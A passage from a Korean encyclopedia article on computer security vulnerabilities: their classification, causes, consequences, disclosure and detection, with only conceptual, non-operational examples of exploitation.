공격은 이것이 시스템 자원이나 그들의 동작을 바꾸고, 무결성 또는 가용성을 위협할 때 활성화 된다. "수동적인 공격"은 시스템의 정보를 사용하거나 배우는 것을 시도하지만, 시스템 자원에 영향을 미치고 비밀성을 위협하지는 않는다.[6]

파일:2010-T10-ArchitectureDiagram.png
OWASP: relationship between threat agent and business impact

OWASP는 약간 다른 용어들에서 같은 현상을 묘사한다. 공격 매개를 통한 위협적인 에이전트는 비지니스 영향과 관련된 IT 자원들에 대한 기술적 영향을 미치며 시스템과 관련된 보안 제어들의 취약점을 익스플로잇한다.

전체적인 그림은 위험 시나리오의 위험 요소들을 표시한다.[7]

정보 보안 관리 시스템[편집]

정보 보안 관리와 관련있는 정책들의 집합(ISMS)은 보안 전략을 보장하기 위한 위험 관리 원리에 따라 관리하기 위해 개발되어 왔다. 이러한 대책들은 또한 보안 제어로도 부르지만, 정보 전송에 적용할 경우에는 보안 서비스라고 부른다.[8]

분류[편집]

취약점들은 관련된 자원 클래스에 따라 분류된다.[4]

  • 하드웨어
    • 습도에의 민감성
    • 먼지에의 민감성
    • 오염에의 민감성
    • 보호되지 않은 저장소에의 민감성
  • 소프트웨어
  • 네트워크
    • 보호되지 않은 통신 라인
    • 안전하지 않은 네트워크 구조
  • 직원
    • 부적절한 리쿠르팅 과정
    • 부적절한 보안 인식
  • 위치
    • 홍수의 위험이 있는 지역
    • 신뢰성 없는 전력 공급
  • 관리 기관
    • 정기적 감사의 부족
    • 지속적 계획의 부족
    • 보안의 부족

원인[편집]

  • 복잡함: 크고 복잡한 시스템은 결함과 의도되지 않은 접근점의 가능성을 높인다.[9]
  • 익숙함: 흔하고 잘 알려진 코드와 소프트웨어, 운영체제, 하드웨어를 사용하는 것은 공격자가 결함을 익스플로잇할 수 있는 정보를 제공할 가능성을 높인다.[10]
  • 연결성: 물리적 접속, 권한, 포트, 프로토콜 그리고 서비스들은 각각의 접근할 수 있는 시간이 늘어날수록 취약점은 증가하게 된다.[11]
  • 패스워드 관리 결함: 컴퓨터 사용자는 무차별 대입 공격에 취약한 암호를 사용한다. 사용자들은 프로그램이 접근할 수 있는 컴퓨터에 암호를 저장한다. 사용자들은 많은 프로그램과 사이트들에서 암호를 재사용한다.[9]
  • 근본적인 운영체제 설계 결함: 운영체제 설계자는 사용자/프로그램 관리에 차선의 정책을 선택한다. 예를들면 기본 권한과 같은 정책을 가진 운영체제는 모든 프로그램과 사용자들에게 컴퓨터 전체에 접근할 수 있는 권한을 준다. [9] 이 운영체제 권한은 바이러스와 악성코드가 관리자를 대신하여 명령어를 실행할 수 있게 한다.[12]
  • 인터넷 웹사이트 검색: 몇몇 인터넷 웹사이트들은 컴퓨터에 자동으로 설치될 수 있는 스파이웨어애드웨어를 포함한다. 이러한 웹사이트 방문 이후, 컴퓨터 시스템은 감염되고 개인 정보가 수집되고 다른 개인으로 보내질 수 있다.[13]
  • 소프트웨어 버그: 프로그래머는 익스플로잇할 수 있는 버그를 소프트웨어 프로그램 안에 남겨둘 수 있다. 소프트웨어 버그는 공격자가 애플리케이션을 악용할 수 있게 한다.[9]
  • 확인되지 않은 사용자 입력: 프로그램은 모든 사용자의 입력이 안전하다고 가정한다. 입력이 확인되지 않은 프로그램들은 의도되지 않은 명령어의 실행을 허용하게 된다.[9]
  • 과거의 실수를 배우지 않는 것.[14][15] 예를들면 IPv4 프로토콜 소프트웨어에서 발견된 취약점들이 새로운 IPv6에도 구현될 수 있다.[16]

연구는 대부분의 취약한 부분이 사용자나 설계자 등 같이 사람에 의한 것이라는 점을 보여준다.[17] 그러므로 사람들은 위협, 자원, 정보 자원 등의 역할에 따라 고려되어야 한다. 사회공학 기법은 증가하는 보안 고려 사항이다.

취약점 결과[편집]

보안 위반의 영향은 매우 크다. IT 관리자나 높은 관리직이 취약점이 있는 IT 시스템과 애플리케이션에 대해 쉽게 알 수 있는 것과 IT 위험에 대해 어떤 조치도 취하지 않는 것은 대부분의 경우에 좋지 않은 행위이다. 프라이버시 법은 관리자들이 보안 위험에 대한 영향과 가능성을 줄이는 것을 강요한다. 모의 해킹은 조직에 의해 채택된 약점과 대응책을 확인하는 형태이다.[18] IT 위험을 전문적으로 관리하는 적절한 방식은 정보 보안 관리 시스템을 채택하는 것이다.[8]

정보 보안의 중요한 개념 중 하나는 종심방어의 원리이다. 즉, 다계층 방어 시스템을 설치하는 것은:

  • 익스플로잇을 예방한다.
  • 공격을 탐지하고 가로챈다.

침입 탐지 시스템은 공격들을 탐지할 때 사용되는 시스템들의 클래스의 한 예이다.

물리 보안은 정보 자산을 물리적으로 보호하는 방식들의 집합이다.

개발된 좋은 보안 수준을 충족시키기 위하여 몇몇 기준들의 집합들이 만족되어야 한다. ITSEC와 공통평가기준이 두 예이다.

취약점 공개[편집]

취약점들의 공개에 대한 책임은 많은 논란이 있는 주제이다. 2010년 8월의 테크 헤럴드에 의하면 "구글, 마이크로소프트 등이 최근에 이러한 공개를 다루는 가이드라인과 선언을 발행하였다.[19]

취약점 식별과 제거[편집]

컴퓨터 시스템에서 취약점들을 발견할 수 있게 도와주는 많은 소프트웨어 툴들이 존재한다. 비록 이러한 툴들이 감시관에게 현재 존재할 수 있는 취약점들에 대한 좋은 개요를 제공할 수 있지만, 인간의 판단을 대체하지는 못한다. 단지 스캐너에만 의존하는 것은 현재 시스템에 존재하는 문제들에 대한 제한된 관점과 긍정 오류를 만들 수 있다.

취약점들은 모든 주요 운영 체제들에서 발견되고 있다. 이러한 시스템들을 사용하면서 취약점들의 확률을 줄일 수 있는 유일한 방법은 감사와 최적의 배치(방화벽접근 제어의 사용 같은), 세심한 시스템 관리를 포함한 꾸준한 조심을 통해서 가능해 진다.

취약점들의 예시[편집]

취약점들은 아래의 목록들과 관련된다.

  • 시스템의 물리적 환경
  • 직원
  • 관리
  • 조직 내에서 관리 절차와 보안 방식
  • 경영 활동과 서비스 전달
  • 하드웨어
  • 소프트웨어
  • 통신 장비와 시설
  • 그리고 이들의 조합

순수한 기술적 접근이 심지어 물리적 자원도 보호하지 못한다는 것은 명백한 사실이다.

취약점 익스플로잇의 4가지 예시

  • 공격자는 오버플로우 취약점을 찾아서 민감한 데이터를 내보내는 악성코드를 설치한다.
  • 공격자는 사용자가 악성코드가 들어있는 이메일 메시지를 열게 만든다.
  • 내부인이 보호되고 암호화된 프로그램을 USB에 담아와서 집에서 크랙한다.
  • 1층에 설치된 컴퓨터 시스템에 수해로 인한 피해가 발생한다.

소프트웨어 취약점[편집]

다음은 취약점으로 이끄는 소프트웨어 결함의 예시들이다.

몇몇 코딩 가이드라인들이 개발되어 왔으며, 코드가 가이드라인을 따르는지 확인하는 수많은 정적 코드 분석기들이 사용된다.


관련 문서[편집]

참조[편집]

  1. 전공이 컴퓨터 공학이 아닌 사람은 정보처리기사를 먼저 따야 응시 자격이 주어진다. 정보보안기사도 정보처리기사와 마찬가지로 관련학과 상관없이 4년제 대학교의 4학년이면 응시 자격이 된다.
  2. 틀:웹 인용
  3. Foreman, P: Vulnerability Management, page 1.
  4. 4.0 4.1 ISO/IEC, "Information technology -- Security techniques-Information security risk management" ISO/IEC FIDIS 27005:2008
  5. British Standard Institute, Information technology -- Security techniques -- Management of information and communications technology security -- Part 1: Concepts and models for information and communications technology security management BS ISO/IEC 13335-1-2004
  6. 6.0 6.1 Internet Engineering Task Force RFC 2828 Internet Security Glossary
  7. ISACA THE RISK IT FRAMEWORK (registration required)
  8. 8.0 8.1 틀:서적 인용
  9. 9.0 9.1 9.2 9.3 9.4 틀:서적 인용
  10. 틀:웹 인용
  11. "An Introduction to Factor Analysis of Information Risk (FAIR)", Risk Management Insight LLC, November 2006;
  12. 틀:웹 인용
  13. 틀:웹 인용
  14. Ross Anderson.
  15. Neil Schlager.
  16. Hacking: The Art of Exploitation Second Edition
  17. 틀:서적 인용
  18. 틀:서적 인용
  19. 틀:웹 인용